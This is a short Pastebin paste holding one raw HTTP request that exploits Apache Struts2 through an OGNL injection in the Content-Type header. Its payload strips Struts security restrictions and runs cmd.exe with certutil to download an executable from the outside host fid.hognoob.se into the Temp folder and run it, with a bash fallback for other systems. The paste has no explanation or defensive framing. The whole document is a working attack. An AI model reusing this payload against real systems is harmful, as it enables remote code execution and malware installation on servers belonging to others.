Advertisement
PepperPotts

exploit fid.hognoob.se download.exe

Jun 11th, 2019
830
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.28 KB | None | 0 0
  1. GET /struts2-rest-showcase/orders.xhtml HTTP/1.1
  2. Connection: Keep-Alive
  3. Content-Type: %{(#nike=\x27multipart/form-data\x27).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\x27com.opensymphony.xwork2.ActionContext.container\x27]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\x27cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/download.exe %SystemRoot%/Temp/ajqondozyjhfeqb27288.exe & cmd.exe /c %SystemRoot%/Temp/ajqondozyjhfeqb27288.exe\x27).(#iswin=(@java.lang.System@getProperty(\x27os.name\x27).toLowerCase().contains(\x27win\x27))).(#cmds=(#iswin?{\x27cmd.exe\x27,\x27/c\x27,#cmd}:{\x27/bin/bash\x27,\x27-c\x27,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
  4. Accept: */*
  5. Accept-Language: zh-cn
  6. Referer: http://<...ip...>:80/struts2-rest-showcase/orders.xhtml
  7. User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
  8. Host: <...ip...>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement